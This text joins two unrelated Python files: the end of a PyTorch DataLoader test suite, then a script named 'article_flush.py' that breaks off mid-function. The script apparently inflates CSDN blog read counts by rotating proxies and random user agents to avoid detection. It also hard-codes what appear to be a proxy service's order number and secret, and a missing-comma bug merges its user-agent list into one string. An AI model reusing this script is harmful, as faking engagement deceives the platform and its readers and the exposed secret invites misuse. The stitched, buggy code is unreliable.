for i, (input, _target) in enumerate(dl):
if i % 2 == 0:
offset = i * 5 // 2
self.assertEqual(len(input), 2)
self.assertEqual(input, self.data[offset:offset + 2])
else:
offset = i * 5 // 2
self.assertEqual(len(input), 3)
self.assertEqual(input, self.data[offset:offset + 3])
def test_batch_sampler(self):
self._test_batch_sampler()
self._test_batch_sampler(num_workers=4)
if not NO_MULTIPROCESSING_SPAWN:
self._test_batch_sampler(num_workers=4, multiprocessing_context='spawn')
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy(self):
import numpy as np
class TestDataset(torch.utils.data.Dataset):
def __getitem__(self, i):
return np.ones((2, 3, 4)) * i
def __len__(self):
return 1000
loader = self._get_data_loader(TestDataset(), batch_size=12)
batch = next(iter(loader))
self.assertIsInstance(batch, torch.DoubleTensor)
self.assertEqual(batch.size(), torch.Size([12, 2, 3, 4]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_gen_state(self):
from torch.utils.data._utils.worker import _generate_state
# Using NumPy generated states as the reference to test `_generate_state`
# having the same result.
# Test case: ((worker_id, base_seed), expected_state)
test_cases = [
((4, 13434589827475259383), (2884386318, 1088094898, 3523808998, 3860348662)),
((1, 15014285634777110771), (1934848465, 763213760, 2959016433, 179751970)),
((10, 978296274032934101), (1759791917, 3550927336, 1225977135, 1036538043)),
((12, 11868770762134256968), (3974661794, 3331131333, 3630387033, 2885815368)),
((9, 15378787925219019706), (3815056996, 3162224466, 2735102421, 3190253477)),
((5, 9055612723125076328), (3522565701, 3368424109, 959377806, 621878693)),
((15, 14617792358407278405), (3402479508, 1588702753, 1169536393, 3675067356)),
((9, 17363320784006640087), (957989458, 2518334477, 1421725660, 3086155459)),
((12, 480002904169484764), (2732851467, 1762620729, 4055801988, 1277640511)),
((15, 16803975943592702950), (3479415043, 4022359553, 295994005, 3358606349)),
((9, 11704776406047813044), (1968928009, 710113752, 2442656196, 1587420279)),
((10, 16357891985431864516), (1271733898, 4197047399, 3727213786, 2338547348)),
((2, 17423369006318065007), (544294336, 1911284083, 3299147734, 3231058347)),
((2, 2889492011444113593), (3721591783, 2595811276, 2212881745, 977682627)),
((0, 8979703111668486195), (4276723937, 2556068849, 2962827292, 233130238)),
((6, 6269787272229682235), (2548857855, 1216457374, 1012973562, 2999759647))
]
for (worker_id, base_seed), exp in test_cases:
self.assertEqual(exp, _generate_state(base_seed, worker_id))
def test_error(self):
self._test_error(self._get_data_loader(ErrorDataset(100), batch_size=2, shuffle=True))
def test_error_workers(self):
self._test_error(self._get_data_loader(ErrorDataset(41), batch_size=2, shuffle=True, num_workers=4))
@unittest.skipIf(IS_WINDOWS, "FIXME: stuck test")
def test_partial_workers(self):
r"""Check that workers exit even if the iterator is not exhausted."""
if TEST_CUDA:
pin_memory_configs = (True, False)
else:
pin_memory_configs = (False,)
for pin_memory in pin_memory_configs:
loader = iter(self._get_data_loader(self.dataset, batch_size=2, num_workers=4, pin_memory=pin_memory))
workers = loader._workers
if pin_memory:
pin_memory_thread = loader._pin_memory_thread
for i, _ in enumerate(loader):
if i == 10:
break
assert i == 10
del loader
for w in workers:
w.join(JOIN_TIMEOUT)
self.assertFalse(w.is_alive(), 'subprocess not terminated')
if pin_memory:
pin_memory_thread.join(JOIN_TIMEOUT)
self.assertFalse(pin_memory_thread.is_alive())
# Takes 2.5min to finish, see https://github.com/pytorch/pytorch/issues/46065
@skipIfRocm
@unittest.skipIf(not HAS_PSUTIL, "psutil not found")
@slowTest
def test_proper_exit(self):
(r'''There might be ConnectionResetError or leaked semaphore warning '''
r'''(due to dirty process exit), but they are all safe to ignore''')
# TODO: test the case where the pin_memory_thread triggers an
# error/fatal signal. I haven't found out how to properly do that.
for is_iterable_dataset, use_workers, pin_memory, hold_iter_reference in \
itertools.product([True, False], repeat=4):
# `hold_iter_reference` specifies whether we hold a reference to the
# iterator. This is interesting because Python3 error traces holds a
# reference to the frames, which hold references to all the local
# variables including the iterator, and then the iterator dtor may
# not be called before process end. It is important to see that the
# processes still exit in both cases.
if pin_memory and (not TEST_CUDA or NO_MULTIPROCESSING_SPAWN or IS_WINDOWS):
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# DataLoader with pin_memory=True initializes CUDA when its iterator is constructed.
# For windows, pin_memory sometimes causes CUDA oom.
continue
# `exit_method` controls the way the loader process ends.
# - `*_kill` means that `*` is killed by OS.
# - `*_error` means that `*` raises an error.
# - `None` means that no error happens.
# In all cases, all processes should end properly.
if use_workers:
exit_methods = [None, 'loader_error', 'loader_kill', 'worker_error', 'worker_kill']
persistent_workers = self.persistent_workers
else:
exit_methods = [None, 'loader_error', 'loader_kill']
persistent_workers = False
for exit_method in exit_methods:
if exit_method == 'worker_kill':
# FIXME: This sometimes hangs. See #16608.
continue
desc = []
desc.append('is_iterable_dataset={}'.format(is_iterable_dataset))
desc.append('use_workers={}'.format(use_workers))
desc.append('pin_memory={}'.format(pin_memory))
desc.append('hold_iter_reference={}'.format(hold_iter_reference))
desc.append('exit_method={}'.format(exit_method))
desc = 'test_proper_exit with ' + ', '.join(desc)
# Event that the loader process uses to signal testing process
# that various things are setup, including that the worker pids
# are specified in `worker_pids` array.
loader_setup_event = mp.Event()
# Event that this process has finished setting up, and the
# loader process can now proceed to trigger error events or
# finish normally.
tester_setup_event = mp.Event()
loader_p = ErrorTrackingProcess(target=_test_proper_exit,
args=(is_iterable_dataset, use_workers, pin_memory,
exit_method, hold_iter_reference,
loader_setup_event, tester_setup_event,
persistent_workers),
disable_stderr=False)
loader_p.start()
loader_psutil_p = psutil.Process(loader_p.pid)
# Wait for loader process to set everything up, e.g., starting
# workers.
loader_setup_event.wait(timeout=JOIN_TIMEOUT)
if not loader_setup_event.is_set():
fail_msg = desc + ': loader process failed to setup within given time'
if loader_p.exception is not None:
fail_msg += ', and had exception {}'.format(loader_p.exception)
elif not loader_p.is_alive():
fail_msg += ', and exited with code {} but had no exception'.format(loader_p.exitcode)
else:
fail_msg += ', and is still alive.'
if loader_p.is_alive():
# this may kill the process, needs to run after the above lines
loader_p.print_traces_of_all_threads()
self.fail(fail_msg)
# We are certain that the workers have started now.
worker_psutil_ps = loader_psutil_p.children()
def fail(reason):
report_psutil_attrs = ['pid', 'name', 'cpu_times', 'io_counters',
'memory_full_info', 'num_ctx_switches',
'open_files', 'threads', 'status',
'nice', 'ionice']
if reason is None:
err_msg = desc
else:
err_msg = '{}: {}'.format(desc, reason)
err_msg += '\nLoader info:\n\t'
if loader_psutil_p.is_running():
err_msg += str(loader_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
loader_p.print_traces_of_all_threads()
else:
err_msg += 'exited with code {}'.format(loader_p.exitcode)
if use_workers:
err_msg += '\nWorker(s) info:'
for idx, worker_psutil_p in enumerate(worker_psutil_ps):
err_msg += '\n\tWorker {}:\n\t\t'.format(idx)
if worker_psutil_p.is_running():
err_msg += str(worker_psutil_p.as_dict(attrs=report_psutil_attrs))
# this may kill the process, needs to run after the above line
print_traces_of_all_threads(worker_psutil_p.pid)
else:
err_msg += 'exited with unknown code'
self.fail(err_msg)
tester_setup_event.set()
try:
loader_p.join(JOIN_TIMEOUT + MP_STATUS_CHECK_INTERVAL)
if loader_p.is_alive():
fail_reason = 'loader process did not terminate'
if loader_p.exception is not None:
fail(fail_reason + ', and had exception {}'.format(loader_p.exception))
else:
fail(fail_reason + ', and had no exception')
_, alive = psutil.wait_procs(worker_psutil_ps, timeout=(MP_STATUS_CHECK_INTERVAL + JOIN_TIMEOUT))
if len(alive) > 0:
fail('worker process (pid(s) {}) did not terminate'.format(
', '.join(str(p.pid) for p in alive)))
if exit_method is None:
if loader_p.exitcode != 0:
fail('loader process had nonzero exitcode {}'.format(loader_p.exitcode))
else:
if loader_p.exitcode == 0:
fail('loader process had zero exitcode')
if exit_method == 'loader_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Loader error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_kill':
if isinstance(loader_p.exception, RuntimeError):
if 'DataLoader worker (pid' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif isinstance(loader_p.exception, ConnectionRefusedError):
# Sometimes, when the worker is being killed and is freeing its
# resources, the unpickling in loader process will be met an
# a `ConnectionRefusedError` as it can not open a socket to receive
# resource. In such cases, the worker may not have fully exited,
# and the loader can't know this via `is_alive` check or `SIGCHLD`
# handler. So we permit this as an allowed error as well.
# After all, we are happy as long as it terminates.
pass
else:
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
elif exit_method == 'worker_error':
if not isinstance(loader_p.exception, RuntimeError) or \
'Worker error' not in str(loader_p.exception):
fail('loader process did not raise expected exception, but had {}'.format(
loader_p.exception))
finally:
loader_p.terminate()
def test_len(self):
def check_len(dl, expected):
self.assertEqual(len(dl), expected)
n = 0
for _ in dl:
n += 1
self.assertEqual(n, expected)
check_len(self.dataset, 100)
check_len(self._get_data_loader(self.dataset, batch_size=2), 50)
check_len(self._get_data_loader(self.dataset, batch_size=3), 34)
def test_iterabledataset_len(self):
class IterableDataset(torch.utils.data.IterableDataset):
def __len__(self):
return 10
def __iter__(self):
return iter(range(10))
iterable_loader = DataLoader(IterableDataset(), batch_size=1)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=1, drop_last=True)
self.assertEqual(len(iterable_loader), 10)
iterable_loader = DataLoader(IterableDataset(), batch_size=2)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=2, drop_last=True)
self.assertEqual(len(iterable_loader), 5)
iterable_loader = DataLoader(IterableDataset(), batch_size=3)
self.assertEqual(len(iterable_loader), 4)
iterable_loader = DataLoader(IterableDataset(), batch_size=3, drop_last=True)
self.assertEqual(len(iterable_loader), 3)
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_numpy_scalars(self):
import numpy as np
class ScalarDataset(torch.utils.data.Dataset):
def __init__(self, dtype):
self.dtype = dtype
def __getitem__(self, i):
return self.dtype()
def __len__(self):
return 4
dtypes = {
np.float64: torch.DoubleTensor,
np.float32: torch.FloatTensor,
np.float16: torch.HalfTensor,
np.int64: torch.LongTensor,
np.int32: torch.IntTensor,
np.int16: torch.ShortTensor,
np.int8: torch.CharTensor,
np.uint8: torch.ByteTensor,
}
for dt, tt in dtypes.items():
dset = ScalarDataset(dt)
loader = self._get_data_loader(dset, batch_size=2)
batch = next(iter(loader))
self.assertIsInstance(batch, tt)
def test_default_collate_dtype(self):
arr = [1, 2, -1]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.int64)
arr = [1.1, 2.3, -0.9]
collated = _utils.collate.default_collate(arr)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.float64)
arr = [True, False]
collated = _utils.collate.default_collate(arr)
self.assertEqual(collated, torch.tensor(arr))
self.assertEqual(collated.dtype, torch.bool)
# Should be a no-op
arr = ['a', 'b', 'c']
self.assertEqual(arr, _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_bad_numpy_types(self):
import numpy as np
# Should be a no-op
arr = np.array(['a', 'b', 'c'])
self.assertEqual(arr, _utils.collate.default_collate(arr))
arr = np.array([[['a', 'b', 'c']]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([object(), object(), object()])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
arr = np.array([[[object(), object(), object()]]])
self.assertRaises(TypeError, lambda: _utils.collate.default_collate(arr))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_numpy_memmap(self):
import numpy as np
with tempfile.TemporaryFile() as f:
arr = np.array([[0, 1], [2, 3], [4, 5], [6, 7]])
arr_memmap = np.memmap(f, dtype=arr.dtype, mode='w+', shape=arr.shape)
arr_memmap[:] = arr[:]
arr_new = np.memmap(f, dtype=arr.dtype, mode='r', shape=arr.shape)
tensor = _utils.collate.default_collate(list(arr_new))
self.assertTrue((tensor == tensor.new_tensor([[0, 1], [2, 3], [4, 5], [6, 7]])).all().item())
def test_default_collate_bad_sequence_type(self):
batch = [['X'], ['X', 'X']]
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch))
self.assertRaises(RuntimeError, lambda: _utils.collate.default_collate(batch[::-1]))
@unittest.skipIf(not TEST_NUMPY, "numpy unavailable")
def test_default_collate_shared_tensor(self):
import numpy as np
t_in = torch.zeros(1)
n_in = np.zeros(1)
self.assertEqual(t_in.is_shared(), False)
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), False)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), False)
# FIXME: fix the following hack that makes `default_collate` believe
# that it is in a worker process (since it tests
# `get_worker_info() != None`), even though it is not.
old = _utils.worker._worker_info
try:
_utils.worker._worker_info = 'x'
self.assertEqual(_utils.collate.default_collate([t_in]).is_shared(), True)
self.assertEqual(_utils.collate.default_collate([n_in]).is_shared(), True)
finally:
_utils.worker._worker_info = old
def test_excessive_thread_creation_warning(self):
with self.assertWarnsRegex(
UserWarning,
r"excessive worker creation might get DataLoader running slow or even freeze"):
dataloader = DataLoader(self.dataset, batch_size=2, num_workers=1000)
class StringDataset(Dataset):
def __init__(self):
self.s = '12345'
def __len__(self):
return len(self.s)
def __getitem__(self, ndx):
return (self.s[ndx], ndx)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
def setUp(self):
super(TestStringDataLoader, self).setUp()
self.dataset = StringDataset()
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_shuffle_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
for (s, n) in loader:
self.assertIsInstance(s[0], str)
self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
def __len__(self):
return 4
def __getitem__(self, ndx):
return {
'a_tensor': torch.empty(4, 2).fill_(ndx),
'another_dict': {
'a_number': ndx,
},
}
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
def setUp(self):
super(TestDictDataLoader, self).setUp()
self.dataset = DictDataset()
def test_sequential_batch(self):
for persistent_workers in (False, True):
if persistent_workers:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers, num_workers=1)
else:
loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
persistent_workers=persistent_workers)
batch_size = loader.batch_size
for i, sample in enumerate(loader):
idx = i * batch_size
self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})
t = sample['a_tensor']
self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
self.assertTrue((t[0] == idx).all())
self.assertTrue((t[1] == idx + 1).all())
n = sample['another_dict']['a_number']
self.assertEqual(n.size(), torch.Size([batch_size]))
self.assertEqual(n[0], idx)
self.assertEqual(n[1], idx + 1)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_pin_memory(self):
loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
for sample in loader:
self.assertTrue(sample['a_tensor'].is_pinned())
self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class DummyDataset(torch.utils.data.Dataset):
def __init__(self):
self.data = list(range(10))
def __len__(self):
return len(self.data)
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
# The persistent workers always maintain the original
# dataset through the dataloader lifetime
# so the attributes will remain the same as the
# first time the workers where spawned (dataloader iteration)
assert self.start == 0
return self.data[idx]
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDataLoaderPersistentWorkers(TestDataLoader):
def setUp(self):
super(TestDataLoaderPersistentWorkers, self).setUp()
self.persistent_workers = True
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)),
num_workers=1, persistent_workers=True):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_dataset_not_reset(self):
dataset = DummyDataset()
pin_memory_configs = [False]
if TEST_CUDA:
pin_memory_configs.append(True)
for pin_memory in pin_memory_configs:
dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
dataset.start = 0
for i in range(10):
for x in dataloader:
pass
# Changing the start value here doesn't have any effect in the dataset
# cached by the workers. since they are not recreated between epochs
# and can cache values safely
dataset.start = i
class NamedTupleDataset(Dataset):
from collections import namedtuple
Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
Data = namedtuple('Data', ['positive', 'negative'])
def __len__(self):
return 4
def __getitem__(self, ndx):
return self.Batch(data=self.Data(positive=ndx, negative=-ndx),
label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
def setUp(self):
super(TestNamedTupleDataLoader, self).setUp()
self.dataset = NamedTupleDataset()
def test_dataloader_with_namedtuple(self):
# auto-collation
loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertIsInstance(batch.data.positive, torch.Tensor)
self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
# no auto-collation
loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
for batch in loader:
self.assertIsInstance(batch, NamedTupleDataset.Batch)
self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
self.assertIsInstance(batch.data, NamedTupleDataset.Data)
self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
def __init__(self, data):
transposed_data = list(zip(*data))
self.inp = torch.stack(transposed_data[0], 0)
self.tgt = torch.stack(transposed_data[1], 0)
def pin_memory(self):
self.inp = self.inp.pin_memory()
self.tgt = self.tgt.pin_memory()
return self
def is_pinned(self):
return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
data = torch.stack([sample[0] for sample in batch], 1)
t, b = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
data = torch.stack([sample[0] for sample in batch], 0)
b, t = data.size()
lengths = torch.randint(1, t, size=(b,), dtype=torch.int64)
return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
def setUp(self):
super(TestCustomPinFn, self).setUp()
inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
self.dataset = TensorDataset(inps, tgts)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_custom_batch_pin_worker(self):
test_cases = [
(collate_wrapper, self_module.SimpleCustomBatch),
(collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
(collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
]
for collate_fn, elem_cls in test_cases:
loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
pin_memory=True, num_workers=1)
for sample in loader:
self.assertIsInstance(sample, elem_cls)
self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
def __init__(self, data):
self.data = data
self.worker_id = None
def worker_init_fn(self, worker_id):
self.worker_id = worker_id
def __getitem__(self, item):
return self.worker_id, self.data[item]
def __len__(self):
return len(self.data)
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestIndividualWorkerQueue(TestCase):
def setUp(self):
super(TestIndividualWorkerQueue, self).setUp()
self.dataset = TestWorkerQueueDataset(list(range(128)))
def _run_ind_worker_queue_test(self, batch_size, num_workers):
loader = DataLoader(
self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
worker_init_fn=self.dataset.worker_init_fn
)
current_worker_idx = 0
for i, (worker_ids, sample) in enumerate(loader):
self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
current_worker_idx += 1
if current_worker_idx == num_workers:
current_worker_idx = 0
def test_ind_worker_queue(self):
for batch_size in (8, 16, 32, 64):
for num_workers in range(1, 6):
self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers)
class SetAffinityDataset(IterableDataset):
def __iter__(self):
torch.randperm(1)
after = os.sched_getaffinity(0)
return iter(after)
def worker_set_affinity(_):
os.sched_setaffinity(0, [2])
@unittest.skipIf(
not hasattr(os, 'sched_setaffinity'),
"os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
def test_set_affinity_in_worker_init(self):
dataset = SetAffinityDataset()
dataloader = torch.utils.data.DataLoader(
dataset, num_workers=2, worker_init_fn=worker_set_affinity)
for sample in dataloader:
self.assertEqual(sample, [2])
class ConvDataset(Dataset):
def __init__(self):
self.x = torch.ones(1, 1, 24000)
# Call convolution on parent process
self[0]
def __len__(self):
return 1
def __getitem__(self, index):
return torch.nn.functional.conv1d(self.x, torch.ones(1, 1, 2))
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
# Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
def test_conv_after_fork(self):
loader = DataLoader(ConvDataset(), num_workers=1)
for x in loader:
self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
run_tests()
|
article_flush.py
|
import sys
import json
import time
import urllib3
import hashlib
import requests
import random
from redis import StrictRedis
from lxml import etree
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from threading import Thread
from multiprocessing import Process
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
rc = StrictRedis(host='127.0.0.1', port='6380',)
article_set_key = 'article_hrefs'
proxy_agent = 'free'
# proxy_agent = 'xdali'
def make_proxy_from_xdali():
_version = sys.version_info
is_python3 = (_version[0] == 3)
orderno = "ZF202011236319vDqRo1"
secret = "2342494cc2b44a3ca09469513c771225"
ip = "forward.xdaili.cn"
port = "80"
ip_port = ip + ":" + port
timestamp = str(int(time.time()))
string = ""
string = "orderno=" + orderno + "," + "secret=" + secret + "," + "timestamp=" + timestamp
if is_python3:
string = string.encode()
md5_string = hashlib.md5(string).hexdigest()
sign = md5_string.upper()
#print(sign)
auth = "sign=" + sign + "&" + "orderno=" + orderno + "&" + "timestamp=" + timestamp
#print(auth)
proxy = {"http": "http://" + ip_port, "https": "https://" + ip_port}
headers = {"Proxy-Authorization": auth, "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36"}
value = {'proxy': proxy, 'headers': headers}
rc.set('proxy', json.dumps(value), ex=10)
return value
def get_proxy_from_xdali():
proxy_info = rc.get('proxy')
if proxy_info:
proxy_dict = json.loads(proxy_info)
else:
proxy_dict = make_proxy_from_xdali()
print('get proxy from web ...')
return proxy_dict
def make_proxy_from_free():
proxy = requests.get('http://127.0.0.1:5010/get').json().get('proxy', None)
if not proxy:
return
delete_proxy_from_free(proxy)
proxy_info = {"http": "http://{}".format(proxy)}
return proxy_info
def delete_proxy_from_free(proxy):
requests.get("http://127.0.0.1:5010/delete/?proxy={}".format(proxy))
def get_user_agent():
user_agent_list = [
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:22.0) Gecko/20130328 Firefox/22.0"
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36"
"Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.0; rv:21.0) Gecko/20100101 Firefox/21.0"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36"
"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36"
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0"
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36"
"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F"
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36"
]
headers = {"user-agent": random.choice(user_agent_list)}
return headers
def get_articles_info():
article_info_set = rc.smembers(article_set_key)
if article_info_set:
article_info_list = [json.loads(i.decode()) for i in article_info_set]
print('get articles info from redis...')
else:
article_info_list = parse_articles_info()
print('get articles info from web parse...')
return article_info_list
def parse_articles_info():
article_set_key = 'article_hrefs'
options = Options()
options.add_argument('--headless')
# options.add_argument('--proxy-server=' + proxy)
browser = webdriver.Chrome(options=options,)
browser.get('https://blog.csdn.net/littleRpl?spm=1001.2101.3001.5113')
elements_list = browser.find_elements_by_class_name('article-item-box')
article_info_list = []
rc.delete(article_set_key)
for element in elements_list:
sub_elem = element.find_element_by_tag_name('a')
read_num = element.find_element_by_class_name('read-num').text
href = sub_elem.get_attribute('href')
title = sub_elem.text
article_info = {'title': title, 'href': href}
article_info_list.append(article_info)
rc.sadd(article_set_key, json.dumps(article_info))
